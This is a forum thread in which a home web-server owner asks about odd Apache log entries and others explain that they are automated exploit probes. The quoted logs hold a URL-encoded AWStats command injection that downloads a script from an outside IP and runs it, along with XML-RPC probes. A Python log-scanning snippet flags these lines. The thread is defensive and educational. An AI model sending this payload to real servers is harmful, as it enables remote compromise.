
Weird log entries 1


turnbui

Programmer
Jul 23, 2005
I use an account through dyndns.org to give userland access to my web pages. I noticed the following log entries that have nothing to do with my web pages. Is this an error on dyndns.org wrongly directing traffic to my vhosts?

218.104.71.173 - - [27/Jan/2006:00:25:45 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 294

218.104.71.173 - - [27/Jan/2006:00:25:46 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 294

218.104.71.173 - - [27/Jan/2006:00:25:47 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 302

218.104.71.173 - - [27/Jan/2006:00:25:49 +0000] "POST /xmlrpc.php HTTP/1.1" 404 286
218.104.71.173 - - [27/Jan/2006:00:25:50 +0000] "POST /blog/xmlrpc.php HTTP/1.1" 404 291
218.104.71.173 - - [27/Jan/2006:00:25:51 +0000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 298
218.104.71.173 - - [27/Jan/2006:00:25:53 +0000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 299
218.104.71.173 - - [27/Jan/2006:00:25:54 +0000] "POST /drupal/xmlrpc.php HTTP/1.1" 404 293
218.104.71.173 - - [27/Jan/2006:00:25:56 +0000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 299
218.104.71.173 - - [27/Jan/2006:00:25:58 +0000] "POST /xmlrpc.php HTTP/1.1" 404 286
218.104.71.173 - - [27/Jan/2006:00:25:57 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 296
218.104.71.173 - - [27/Jan/2006:00:26:01 +0000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 293
218.104.71.173 - - [27/Jan/2006:00:26:00 +0000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 293

64.182.1.110 - - [28/Jan/2006:11:45:07 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 294
64.182.1.110 - - [28/Jan/2006:11:45:08 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 294
64.182.1.110 - - [28/Jan/2006:11:45:09 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 302
64.182.1.110 - - [28/Jan/2006:11:45:14 +0000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 299
 
These are all attempts to exploit some well-known vulnerabilities. It looks like you're OK because your server is returning 404 (not found) errors. I'm guessing that you do have AWStats installed, so make sure that you keep it updated. The various CMSs seem not to be installed, correct?
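A defender-side check for the kind of entries quoted in this thread, written as an added example (it is not code from the original post): it parses Apache common-log lines, flags awstats.pl requests whose configdir parameter carries shell metacharacters (and records where the payload tries to fetch its dropper from), flags POSTs to xmlrpc.php, and counts whether any of those probes got anything other than an error response. The sample input is three lines copied from the thread plus one constructed benign request from the documentation address 192.0.2.10.

```python
import re
from urllib.parse import unquote, urlsplit
from collections import Counter

# Apache common log format, as in the thread: ip ident user [time] "METHOD target HTTP/x" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)
# Shell metacharacters that never belong in a legitimate AWStats configdir value.
SHELL_META = re.compile(r'[|;`$&]')

def classify(line):
    """Return (ip, status, tags) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    path = parts.path.lower()
    tags = []
    if path.endswith('/awstats.pl'):
        # Decode %xx first so encoded metacharacters are caught as well as raw ones.
        q = re.search(r'(?:^|&)configdir=([^&]*)', unquote(parts.query))
        if q and SHELL_META.search(q.group(1)):
            tags.append('awstats-configdir-command-injection')
            dl = re.search(r'\bwget\s+([^\s;|&]+)', q.group(1))  # dropper download source
            if dl:
                tags.append('fetches:' + dl.group(1))
    if m.group('method') == 'POST' and path.endswith('/xmlrpc.php'):
        tags.append('xmlrpc-probe')
    return m.group('ip'), int(m.group('status')), tags

def summarize(lines):
    """Per source IP: request count, non-error responses (the ones to worry about), tags seen."""
    report = {}
    for line in lines:
        r = classify(line)
        if r:
            ip, status, tags = r
            e = report.setdefault(ip, {'requests': 0, 'succeeded': 0, 'tags': Counter()})
            e['requests'] += 1
            e['succeeded'] += int(status < 400)  # anything but an error means the script exists
            e['tags'].update(tags)
    return report

# Sample input: three lines from the thread above plus one constructed benign request.
SAMPLE = [
    '218.104.71.173 - - [27/Jan/2006:00:25:45 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 294',
    '218.104.71.173 - - [27/Jan/2006:00:25:49 +0000] "POST /xmlrpc.php HTTP/1.1" 404 286',
    '192.0.2.10 - - [28/Jan/2006:12:00:00 +0000] "GET /index.html HTTP/1.1" 200 1024',  # constructed
]
```

Run summarize() over a real access log and look first at any IP whose 'succeeded' count is non-zero next to an injection tag.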
 
No, I don't think I have AWStats installed. This was on a Win XP machine with Apache. "The various CMSs seem not to be installed, correct?" - not sure what you mean by CMSs?
Thanks for responding any further info will be soaked up like I'm a sponge though.
 
WordPress, Drupal, phpgroupware, etc. are all Content Management Systems. (See for all of them & more). AWStats is a log analyzing utility.

All of this software is widely used & certain versions have well-known vulnerabilities that can be exploited. I see the same things in my logs, but I don't usually see all the extra parameters with the AWStats requests - that's why I suspected that you actually had AWStats running.
 
Thanks for the explanation. Can you elaborate further on these well-known "vulnerabilities" please? I'll be happy with as much or as little as you care to explain. As you can tell I'm on a learning curve here so any info will be a big help.
Thanks
 
Thanks for that.
So let me see if I understand this. Someone has sent an HTTP request to my IP number in the hope that I have AWStats running and this particular request should give them access to my machine?
Luckily I don't have AWStats installed so they are getting a 404 returned by Apache.

If above is so how did they know I had Apache installed?

As normal any help will be cool.
 
There are numerous ways to find out what web server is running (turn off IE's friendly error messages & go to a page on your server that doesn't exist), but it doesn't really matter to the attacker. They will have a script running on some zombie machine that attempts all of these combinations on every IP that's listening. It's good that you're examining your logs & questioning suspicious entries.
 
My, my. I don't know whether to be alarmed or impressed. I've heard of hacking, naturally, but to see it done to me is quite frightening. Not that I've got anything worth having on my machine, but I may have.

I just thought it'd be cool to host my own web pages. Might have to rethink this.

Hang on a minute - I do my internet banking on this machine
shudder.

I think I'd like to learn a lot more on this and the various techniques employed as well as how to prevent them. Have you any places that might give up a few of these other "secrets" ?

Either way, thanks for the information.
 
There are thousands of sites with useful security and configuration information. Good sources are always: the OS web site (in your case MS), the server software site (apache.org), the US CERT site, and any & all known good antivirus & antispyware sites, and the web site of any other software that interfaces with the publicly accessible services (like CMS, cgi scripts, etc). For example, AWStats is a CGI script that runs on a web server. It analyzes the Apache access & error logs and then makes pretty graph-filled web pages. With a little effort configuring it, even the versions with the vulnerability can be made to only listen & answer for machines & IP addresses inside your local network. Unfortunately, many users left it open to the internet.

You seem to already be thinking about the ramifications of making a machine accessible to the entire world and that's good. Common sense is a good starting point - don't expose any more than you need to; what would happen if it were compromised, & how would you know / what would you do?

There are many sites out there running old versions of those CMSs that have been hacked & don't know it because they don't look at the logs that you've already been reviewing. Going back to the AWStats scenario - even if there were no security vulnerabilities, why would you want this info available to the internet? If you follow this line of thinking & keep up with the software patches / security updates & do all the required research, you'll be fine. Just the fact that you noticed & asked the right questions is a good start.
 
Whew! What a minefield. But the start of a long journey begins with the first step - I guess. Thanks again for your invaluable info. Looks like I've got a ways to go, but at least it's something I have an interest in so it isn't all bad.

Cheers smah.
 